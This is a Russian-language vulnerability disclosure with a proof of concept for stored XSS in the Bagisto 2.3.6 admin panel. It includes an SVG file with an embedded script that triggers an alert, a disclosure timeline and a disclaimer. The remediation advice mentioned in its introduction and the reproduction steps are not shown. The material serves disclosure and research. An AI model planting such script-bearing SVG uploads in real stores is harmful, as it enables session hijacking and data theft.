
Доказательство концепции для уязвимости хранимого XSS в панели администратора Bagisto, демонстрирующее загрузку SVG с вредоносным JavaScript и содержащее рекомендации по устранению уязвимости.
Уязвимость межсайтового скриптинга (XSS) с сохранением существует в пути создания товаров в админ-панели Bagisto 2.3.6, что позволяет атакующему загрузить специально созданный SVG-файл, содержащий вредоносный код JavaScript. Данная уязвимость может быть использована аутентифицированным администратором для выполнения произвольного JavaScript в браузере, что потенциально может привести к перехвату сеанса, краже данных или несанкционированным действиям.
Уязвимость эксплуатируется, когда аутентифицированный администратор загружает специально созданный SVG-файл, содержащий вредоносный JavaScript.
Шаги для воспроизведения:
Пример вредоносной SVG-полезной нагрузки:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| Дата | Действие |
|---|---|
| 2025 АВГ | Уязвимость обнаружена |
| 2025 АВГ | Ответственное раскрытие |
| 2025 АВГ | Запрошен CVE ID у MITRE |
| 2025 ОКТ | Присвоен CVE, публичное раскрытие |
Информация и код доказательства концепции (PoC), представленные в этом репозитории, предназначены только для образовательных и этических исследовательских целей. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый информацией или кодом, представленными здесь. Пользователь берёт на себя всю ответственность за свои действия. Ответственность пользователя — убедиться в соответствии со всеми применимыми местными, государственными и федеральными законами.